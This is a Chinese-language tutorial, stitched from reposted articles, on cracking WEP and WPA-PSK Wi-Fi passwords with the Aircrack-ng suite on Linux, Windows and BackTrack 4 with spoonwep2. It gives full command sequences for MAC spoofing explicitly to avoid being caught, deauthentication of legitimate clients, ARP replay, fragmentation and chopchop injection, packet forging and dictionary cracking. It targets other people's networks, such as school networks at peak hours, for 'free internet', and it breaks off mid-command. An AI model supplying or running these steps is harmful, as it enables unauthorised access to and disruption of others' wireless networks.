无线网络破解aircrack-ng-win for windows版的哦.doc

无线破解攻击工具Aircrack-ng使用详解/破解无线路由AP密码 2010年07月30日 星期五 13:26Aircrack-ng无线破解工具包有很多工具，用到的工具主要有以下几个：airmon-ng 处理网卡工作模式airodump-ng 抓包aircrack-ng 破解aireplay-ng 发包，干扰另外还要用到以下 linux 命令:ifconfig 查看修改网卡状态和参数macchanger 伪造 MACiwconfig 主要针对无线网卡的工具 (同 ifconfig)iwlist 获取无线网络的更详细信息另外还有其他的 linux 基本命令，我就不提示了。具体破解步骤：1. 修改无线网卡状态：先 down 掉2. 伪造无线网卡的 MAC 地址：安全起见，减少被抓到的可能3. 修改网卡工作模式：进入Monitor状态，会产生一个虚拟的网卡4. 修改无线网卡状态： up5. 查看网络状态，记录下 AP 的 MAC 和本机的 MAC ，确定攻击目标6. 监听抓包：生成 .cap 或 .ivs7. 干扰无线网络：截取无线数据包，发送垃圾数据包，用来获得更多的有效数据包8. 破解 .cap 或 .ivs ，获得 WEP 密码，完成破解下面详细介绍一下各个命令的基本用法（参照命令的英文说明）1. ifconfig用来配置网卡，我们这里主要用来 禁用和启用 网卡：ifconfig ath0 downifconfig ath0 up禁用一下网卡的目的是为了下一步修改 MAC 。2.macchanger用来改变网卡的 MAC 地址，具体用法如下：usage: macchanger options device-h 显示帮助-V 显示版本-s 显示当前MAC-e 不改变mac,使用硬件厂商写入的MAC-a 自动生成一个同类型的MAC，同厂商的-A 自动生成一个不同类型的MAC，不同厂商的-r 生成任意MAC-l 显示已知厂商的网卡MAC地址分配，这个很有用，可以根据MAC查出来是哪个厂商生产的产品-m 设置一个自定义的MAC 如: macchanger mac=00:34:00:00:00:00 ath0 。3.airmon-ng启动无线网卡进入 Monitor 模式，useage: airmon-ng channel 启动，停止，检测 指定无线网卡channel 监听频道，现代大多数无线路由默认是 6，随便扫描一下都是这个频道，网管们应该换换了4.iwconfig专用的无线网卡配置工具，用来配置特殊的网络信息，不带参数时显示可用网络。useage：iwconfig interface optionsessidNN|ON|OFF 指定essid号 开启关闭nwidNN|on|off 指定网络id号 开启关闭mode managed|ad-hoc|. 指定无线网络工作模式/类型freq N.NNNNK|M|G 指定工作频率channel N 指定频道ap N|off|auto 指定AP号 关闭/自动sens N sens 号nick N nick 号rate N|auto|fixed 速率控制rts N|auto|fixed|off rts控制，如果不知道什么是RTS，那就回去好好去学网络，不用往下看了frag N|auto|fixed|off 碎片控制enc NNNN-NNNN|off 范围power period N|timeout N 电源 频率/超时retry limit N|lifetime N 重试 限次/超时txpower Nmw|dBm 功率 毫瓦/分贝commit 处理5.iwlist主要用来显示无线网卡的一些附加信息,同上useage: iwlist interface optionsscanning 扫描frequency 频率channel 频道bitrate 速率rate 速率encryption 加密key 密钥power 电源txpower 功率ap apaccespoints appeers 直连event 事件6.airodump-ng抓包工具,我最喜欢用的,详细用法如下:usage: airodump-ng ,.Options:ivs :仅将抓取信息保存为 .ivsgpsd :使用 GPSdwrite :保存为指定日文件名,我一般用这个,尤其是多个网络时,指定了也好区分-w :同 writebeacons :保存所有的 beacons ,默认情况况下是丢弃那些无用的数据包的update :显示更新延迟,没有用过showack :显示ack/cts/rts状态,还是那句,不知道rts就不用看了-h :隐藏已知的,配合上面的选项使用-f :跳频时间berlin :无数据包接收时延迟显示的时间,这句不太好翻译,意思是当那个信号发出设备没有发出数据包多少时间之后,就停止对它的监视.默认120秒.建议学好英文 去读原文,翻 译的都会有出入,这是我的理解.(mhy_mhy注)-r :从指定的文件读取数据包.我也想有人给我抓好包放哪里,呵呵Filter options:encrypt : 使用密码序列过滤 APnetmask : 使用掩码过滤 APbssid : 使用 bssid 过滤 AP-a : 过滤无关的客户端默认情况下使用2.4Ghz,你也可以指定其他的频率,通过以下命令操作:channel :指定频道band :制定带宽-C :指定频率MHzcswitch : 设置频道交换方式0 : FIFO (default) 先进先出(默认)1 : Round Robin 循环2 : Hop on last 最后一跳-s : 同上help : 显示使用方法,翻译到这里,感觉还是英文的贴切一点,建议读原文7.aireplay-ng搞破坏的工具,注意杀伤力很大,甚至可以损坏劣质的 AP 设备(小内存的路由器可能会重启,或者彻底被破坏掉),我很喜欢这个东西,相信你也会喜欢的,使用时注意分寸.usage: aireplay-ng Filter options:-b bssid : AP的 MAC-d dmac : 目标的 MAC-s smac : 来源的 MAC-m len : 最小包长度-n len : 最大包长度-u type : 帧控制, type field-v subt : 帧控制, subtype field-t tods : 帧控制, To DS bit-f fromds : 帧控制, From DS bit-w iswep : 帧控制, WEP bit-D : 禁用 AP 发现功能Replay options:-x nbpps : 每秒包数量-p fctrl : 框架设定 (hex)-a bssid : 设置AP的 mac-c dmac : 设置目标的 MAC-h smac : 设置来源的 mac-g value : 改变环缓存大小 (默认8)-F : 选择第一个匹配的包Fakeauth attack options:-e essid : 设置目标 AP 的 SSID-o npckts : 每秒爆破的包数量 (0 自动, 默认 1)-q sec : 存活时间 秒-y prga : 共享可信的 key流Arp Replay attack options:-j : 注入 fromDS 数据包,还没有用过这个选项Fragmentation attack options:-k IP : 设置目的IP 碎片-l IP : 设置源IP碎片Test attack options:-B : 激活 bitrate 测试source options:-i iface : 设置抓包的接口设备-r file : 从pcap文件析取数据包attack modes (Numbers can still be used): 攻击模式，最具杀伤力的地方deauth count : 不信任一切 (-0)fakeauth delay : 欺骗AP的信任 (-1)interactive : 交互的选择 (-2)arpreplay : 标准的 ARP-request replay (-3)chopchop : 解密 WEP 包 (-4)fragment : 生成有效的 key流 (-5)caffe-latte : 从客户端获取新的 IVs (-6)cfrag : 对客户端进行碎片攻击 (-7)test : 测试注射及效果 (-9)help : 显示这个帮助,这部分是全部依照我的使用来翻译,没有完全准确的翻译,主要对付 那些不给出作者就引用的人,鄙视抄袭.8.aircrack-ng破解KEY,漫长的过程.漫不漫长取决于两个方面: 一是网管的聪明程度(能否设置出复杂的密码),二是电脑的速度.usage: aircrack-ng options Common options:-a : 暴破 (1/WEP, 2/WPA-PSK)-e : 选择 essid 为目标-b : 选择 ap的 mac 为目标,就是破解识别的关键字-q : 使用安静模式,无数出模式-C : 将所有的 AP 合并为一个虚拟的Static WEP cracking options:-c : 仅搜索字母数字-t : 仅搜索二进制-h : 搜索数字关键字 (用于坏掉的部分),翻译不出来了-d : 指定掩码(A1:XX:CF:YY)-m : 用 MAC 匹配可用的数据包-n : WEP 长度 64/128/152/256/512-i : WEP 索引(1 to 4), default: any-f : 暴破强度 默认2,原文字面意思是”禽兽强迫 捏造 事实”,呵呵-k : 禁用一种破解方式 (1 to 17)-x or -x0 : 禁用最新关键字暴破-x1 : 使用最新关键字暴破 默认-x2 : 用最新两个字节暴破-y : 实验单线程模式-K : KoreK 攻击 (pre-PTW)-s : 显示为 ASCII-M : 最大数量 ivs 使用-D : WEP 非隐蔽模式-P : PTW debug: 1 disable Klein, 2 PTW-1 : 尝试一次 PTWWEP and WPA-PSK cracking options:-w : 指定目录文件,可以多个-r : 制定 airolib-ng 数据库,不能和 -w 一起使用help : 显示这个帮助使用Aircrack-ng for Windows破解WPA来源：转载 作者：佚名 时间：2010-03-24 22:19:02 分享到： QQ空间新浪微博腾讯微博人人网由于在Windows环境下不能如Linux环境般直接调用无线网卡，所以需要使用其他工具将无线网卡载入，以便攻击工具能够正常使用。在无线攻击套装Aircrack-ng的Windows版本下内置了这样的工具，就是airserv-ng。步骤1：打开CMD，通过cd命令进入到aircrack-ng for Windows版本所在目录，输入airserv-ng，可以看到如图5-29所示的内容。图5-29 在CMD下运行airserv-ng参数解释：* -p，指定监听的端口，即提供连接服务的端口，默认为666；* -d，载入无线网卡设备，需要驱动支持；* -c，指定启动工作频道，一般设置为预攻击AP的工作频道，默认为1；* -v，调试级别设定。作为Windows下的破解，第一步就是使用airserv-ng来载入我们当前使用的无线网卡，为后续破解做准备，命令如下（注意：在命令中出现的引号一律使用英文下的引号输入）：airserv-ng -d commview.dll|debug 或者airserv-ng -d commview.dll| my adapter id 输入完成后airserv-ng会自动搜寻现有无线网卡，会有提示，选择正确的无线网卡直接输入y，此时airserv-ng就在正常载入驱动后，同时开始监听本地的666端口。换句话说，airserv-ng提供的是该无线网卡的网络服务，其他计算机上的用户也可以连接到这个端口来使用这块网卡，如图5-30所示。图5-30 airserv-ng工作中步骤2：现在可以使用airodump-ng来搜索当前无线环境了。注意，要另开启一个CMD，再输入如下命令：airodump-ng 127.0.0.1：666这里在IP地址处输入为本机即127.0.0.1，端口采用的是默认的666。图5-31 在CMD下运行airodump-ng如图5-31所示，当确定预攻击目标AP的频道后，使用组合键Ctrl + C中断，即可使用如下参数来精确定位目标：airodump-ng -channel number -w filename 127.0.0.1:666这里输入“airodump-ng -channel 7 -w onewpa 127.0.0.1:666”，回车后可看到如图5-32所示的内容。图5-32 在CMD下运行airodump-ng进行抓包步骤3：现在，就可以和前面在BackTrack 2中讲述的一样进行Deauth攻击了，另开启一个CMD，输入（如图5-33所示）：aireplay-ng -0 1 -a APs MAC 127.0.0.1:666 参数解释参考前面对应章节。图5-33 进行Deauth攻击在个别情况下，可能会在上面命令结束时出现wi_write:Operation now progress这样的提示，这个提示在很多无线网卡下都会出现，意思是当前进程调用被占用时，Deauth攻击在大多数情况下并不会受此影响。步骤4：再开启一个CMD，输入命令查看是否捕获到WPA握手数据包。命令如下：aircrack-ng 捕获的数据包名如果没有捕获到WPA握手数据包，就会有如图5-34所显示的“0 handshake”，这个时候切回到刚才aireplay-ng所在的CMD中重复进行Deauth攻击。图5-34 没有获取到WPA握手数据包攻击过程中注意观察airodump-ng工作界面，当右上角出现如图5-35所示的提示时，就表示成功截获到WPA握手数据包了。图5-35 成功获取到WPA握手数据包此时再次使用aircrack-ng 打开捕获的数据包，就可以看到截获到WPA 的显示了，如图5-36所示，接下来便可以进行WPA本地破解了。图5-36 载入破解时成功识别出获得的WPA握手数据包破解WPA-PSK输入命令如下：aircrack-ng -w password.txt onewpa*.cap这里介绍一个小技巧，可以在输入数据包名后面加一个*号，来自动将捕获的该名称的所有数据包整合导入。回车后，显示如图5-37所示。图5-37 在CMD下破解WPA-PSK加密如同在Linux下破解WPA一般耐心地等待，就可以看到WPA密钥成功解出了，如图5-38所示。图5-38 成功破解出WPA-PSK密码Backtrack应用Backtrack 是处于世界领先地位的渗透测试和信息安全审计发行版本。有着上百种预先安装好的工具软件，并确定能够完美运行，Backtrack4 提供了一个强大的渗透测试平台从Web hack的应用程序到RFID 审查，都可由Backtrack来完成。 使用非常简单，只需要用虚拟机启动后，点击桌面图标运行spoonwep2，即可。 增加rtl8187L芯片r8187驱动,可调发射功率,更高的灵敏度,crack首选； 增加rt73芯片rt73驱动,crack首选； 增加madwifi驱动； 安装到硬盘后可使用apt-get安装所需软件或更新。 通过以上的几种方法皆可启动下载的BT4，之后就需要输入“startx”进入系统了，后进入系统的时候就开始破解了，现在就要去找spoonwep2了，左下角开始的旁边有个黑色的框框，也就是SHELL，点击，输入：spoonwep就可以显示spoonwep2的界面了。在各项选项里选择以下操作 NET CARD网卡接口 选择 WIFI0 DRIVER 驱动 选择 NORMAL MODE 模式 选择 UNKNOWNVICTIM 然后点击下面的NEXT,接着就会转入VICTMS DISCOVERY界面。好了，可以看见VICTMS DISCOVERY界面左面的选项是默认的CHANHOPPING 这个事无线的AP的工作频道，不要动，直接点击右侧的LAUNCH 按钮。这时会弹出抓包窗口（SCAN），可作为参考，也可不用理会。稍等一会儿，如果能够找到符合要求的信号，会在当前的victims discovery窗口中显示扫描到的信息，其中：ESSID 路由广播名称MAC路由的MAC地址CHAN 使用的频道POW 信号强度DATA(注意：这个数值一直为0基本无法破解，你可另寻时机等到有DATA再破）CLIS 空白代表无客户端，打钩则代表有客户端每一行代表一个扫描到的无限AP信号，点击选中你要破解的信号（尽量选择有DATA以及CLIS后有对号的信号进行破解）；然后在信号信息框的下面相应的显示出在AP当前的客户端，你可以点击选中一个客户端（这样更容易破解一些），也可以不选。然后点击窗口下边的selectionOK按钮，就会进入attack panel界面。 在attack panel界面，攻击模式下拉框中几个选项的区别如下（由客户端建议选择第一项，无客户端建议选择第四项）：ARPREPLAYATTACK （有客户端时用,3ARP注入）P0841REPLAYATTACK(第三选择，2交互注入）CHOPCHOP&FORGEATTACK（第二选择，4断续注入）FRAGMENTATION&FORGE ATTACK（首选，5碎片注入）然后直接点击launch即可是破解，这时同样会在任务栏出现一个新的窗口，你可以用鼠标点击出来看一看，里面会显示一些相关的信息，如信号强度等。大家注意上面图片里有个24858 IVS，其中IVS就是我们要寻找的带有特殊数据包的IVS格式包，我说的抓包其实就是抓的这个IVS包。基本学校里的密钥抓到大概10000IVS就差不多出密码了，如果到了4W还没显示密码的话，我还是劝告童鞋去换个目标吧，这段抓包的时间就去喝喝茶，去看看书吧。因为我们是被动抓的包，所以必须跳个好点，流量大的时间段去破解，因为那时候对方在下迅雷的时候，会飞快的产生IVS包，所以我建议大家在12点半到1点半，晚上九点半到11点半，这两段时间内选择破解，因为是上网的高峰。注意，最后破解出来的密码是在attack panel界面下方显示（而不是在spoonwep dump窗口显示）。 密码就是：52 15 21 13 14.然后，重启进入XP系统，选择无线连接里的你刚才破解的那个AP，填上密钥，就能享受免费带来的上网乐趣了。=以上是最最最最简便的傻瓜方法，一般都是那样破解的方便也省事儿，但是有的时候，目标AP不会产生大量的IVS包，会对于我们抓包产生非常大的影响，因为本身没有太多的流量产生，我们在通过WIFI的TCP握手的时候产生的有效IVS也会少的可怜，这样对于必须要抓至少10000IVS来说，简直是浪费时间，所以，这时候我们就要化被动为主动的注入，使其多产生相互之间的更多数据交汇，这样针对没有客户的AP或者在空闲的AP来说是非常有效地。三:手动注入（SHELL代码注入，新手跳过） 以下主要针对SHELL的代码输入操作，其实SPOONWEP就看做一个界面型的代码整合软件，现在我们要脱离它的帮助，自己去手动注入。还是拿5100网卡做演示（其他的网卡方法大体一致，网上搜更多的资料看看吧） shell 1:-1.ifconfig -amacchanger -m 00:11:22:33:44:55 wlan02.ifconfig -a wlan0 up(5100可能要加载网卡才支持注入?)3.airmon-ng start wlan0 6(6是频道)另一说5100要支持注入用airmon-ng start wlan0如果这里回显 则下面命令所有端口号要用wlan0aireplay-ng -9 mon0 / aireplay-ng -test mon0(注入攻击成功/不成功)(检测你的网卡是否支持注入)4.airodump-ng -w pack -c 6 mon0/wlan0(pack是随便起的获取的ivs的保存文件的名字)另一说用airodump-ng -ivs -w pack -c 6 mon0/wlan0shell 2:-一、有客户端：破解:abcd四种方式a.合法客户端产生大量有效的数据，能直接获得大量cap。收到10000以上data后，直接转shell 3,破解密码b.合法客户端只能产生少量数据，就需要注入攻击加速产生大量数据。5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac) mon0/wlan0(wlan0测试不行)Read 11542 packets ,send 71524 packets . 很多类似行c.合法客户端不在通信，注入模式不成功，用-0 冲突模式强制断开合法客户端和ap连接，使之重新连接，新连接所产生的握手数据让-3 获得有效的ARP从而完成ARP注入5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac) wlan06.aireplay-ng -0 10 -a 000000000000(APmac) -c 111111111111(合法客户端mac) wlan0(可能要另开窗)d.有客户端，并且客户端能产生有效arp 数据的另类破解方式输入modprobe r iwl3945(加载网卡)输入modprobe ipwraw输入airmon-ng start wlan0 6现在，只要一个命令就搞定，输入:输入wesside-ng -i wlan0 -v 01:02:03:04:05:06。 二、无客户端：5.aireplay-ng -1 0 -a 000000000000(APmac) -h 111111111111(Mymac) mon0(我成功了)另一说用aireplay-ng -1 0 -e Kingnet -a (APmac) -h (Mymac) mon0/wlan0(建立虚拟伪装连接)如果失败可尝试降低网卡速率后再试:iwconfig mon0 rate 2M(注意大写)破解:abcd四种方式a.-2 crack mode -建立虚拟连接后直接用-2交互攻击模式集合了抓包，提数据和发包攻击6.aireplay-ng -2 -p 0841 -c ffffffffffff -b (ap mac) -h (my mac) wlan0发包成功后可得到足够的ivs，然后用aircrack-ng破解b.-3 crack mode -6.aireplay-ng -3 -b (AP mac) -h (MY mac) mon07.用aircrack-ng破解c.-4 crack mode -4攻击模式；制造数据包；-2交互式攻击模式6.aireplay-ng -4 -b (APmac) -h (Mymac) mon07.packetforge-ng -0 -a (APmac) -h (Mymac) -k 255.255.255.255 l 255.255.255.255 -y replay-xxx.xor -w myarp(提取上面xor 文件来伪造一个arp包)8.aireplay-ng -2 -r myarp mon0一说用aireplay-ng -2 -r myarp -x 512 mon0(发现了可利用的myarp的数据包，按y后，立刻注入攻击。Date疯涨)9.用aircrack-ng破解d.-5 crack mode -5碎片攻击模式；制造数据包；-2交互式攻击模式(我成功过)6.aireplay-ng -5 -b (ap mac) -h (my mac) mon0(利用-5 碎片攻击模式获得一个可用的包含密钥是数据文件（xor 文件）)7.packetforge-ng -0 -a (APmac) -h (Mymac) -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxx.xor -w myarp(Myarp随便起的文件名)8.aireplay-ng -2 -r myarp -x 256/512 mon0(这时，前面的抓包窗口上的data 将迅速增加)(512是攻击速度，1024是最大值)9.采用aircrack-ng 来进行破解shell 3:-aircrack-ng *.cap如果shell 1用了-ivs 参数，则这里用aircrack-ng *.ivs(我成功了)另一说用aircrack-ng -n 64 -b APmac pack-01.capKEY FOUND! . 附:5100用BT4+spoonwep2破解1.把spoonwep2放在BT4modules下,启动BT42.ln -fs bash /bin/shls -al /bin/sh3.开spoonwep2，里面可以找到网卡了,选wlan0进入搜索，但这时不会搜出来什么，关闭一下spoonwep2再重启spoonwep2，这时网卡项里有一个mon0的，选mon0,driver选normal,mode选unknow victim,选定PO841 replay attack，点击launch后就等待密码的出来(sata数据包到30000个左右)。(注：论坛中的高手说spoonwep2支持5100AGN网卡注入式破解)-end-WPA-1.ifconfig -a2.ifconfig -a wlan0 up3.airmon-ng start wlan0 6(6是频道)4.airodump-ng -w 12345 -c 6 mon0/wlan0(保存名为12345.cap)(-w：写入文件，-c：截取cap的频道)5.aireplay-ng -0 10 -a (ap mac) mon0/wlan0或者输入：aireplay-ng -0 10 -a (ap mac) -c (合法客户端mac) mon0/wlan0(wlan0可能不对)(-c后面为合法无线客户端的MAC地址)(迫使AP重新与已连接的合法客户端重新握手验证)(攻击几次后可以做破解尝试。WPA破解不用等到数据Data 达到几万， 因为它只要一个包含WPA握手验证包就可以了)Cap数据包破解:a.暴力破解6.aircrack-ng -x -f 2 12345*.cap另一说是用aircrack-ng -z -b (ap mac) 12345*.capb.字典破解6.aircrack-ng -w password.txt 12345*.cap另一说是用aircrack-ng -w password.txt -b (ap mac) 12345*.cap(-w：是字典破解模式Password.txt是你事先准备好的字典。技巧：可以在windows 下使用下载的字典工具生产字典，再在BackTrack3 下拷贝到/root 下（aircrack 默认的工作目录在/root）。请注意，破解WPA 密码的时间取决于密码难易程度，字典包含程度，内存及CPU 等。多则数小时。 )c.把CAP数据包拷贝出来在WIN下用WinAircrack 破解启动WinAircrack,General-)Encryption type-)wpa-psk,Capturefiles-)12345-01.capWpa-)Dictionary file-)pswd.txt,点右下角Aircrack the key.d.HASH破解6.genpmk -f dictionary.txt -d D-LINK.ha